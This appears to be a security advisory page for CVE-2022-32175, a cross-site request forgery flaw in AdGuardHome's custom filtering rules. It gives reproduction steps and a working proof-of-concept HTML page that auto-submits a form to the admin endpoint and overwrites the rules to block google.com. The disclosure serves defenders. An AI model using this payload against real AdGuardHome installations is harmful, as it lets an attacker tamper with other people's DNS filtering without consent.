icon

We found results for “

CVE-2022-32175

Date: October 11, 2022

Overview

In AdGuardHome, versions v0.95 through v0.108.0-b.13 are vulnerable to Cross-Site Request Forgery (CSRF), in the custom filtering rules functionality. An attacker can persuade an authorized user to follow a malicious link, resulting in deleting/modifying the custom filtering rules.

Details

AdGuardHome is vulnerable to Cross-Site Request Forgery (CSRF), in the custom filtering rules functionality. An attacker can persuade an authorized user to follow a malicious link, resulting in deleting/modifying the custom filtering rules.

PoC Details

Sign in with an admin account. Navigate to filters, under which select custom filtering rules, where existing rules are visible. Now open the CSRF file hosted on the attacker's server at the victim’s end. The source code of the file will be provided in the POC section below. You will notice the rule has been changed in custom filtering rules, blocking the “google.com” domain. Now try accessing “google.com” in a new tab. You will see that you can no longer connect.

PoC Code

<html>
    <body onload="document.createElement('form').submit.call(document.getElementById('myForm'))">
        <form id="myForm" name="myForm" action="http://192.168.1.153/control/filtering/set_rules" method="POST" enctype="text/plain">
            <input type="text" name="/google.com(" value=")?/">
            <input type="submit"/>
        </form>
    </body>
</html>

Affected Environments

AdGuardHome versions v0.95 through v0.108.0-b.13

Prevention

No Fix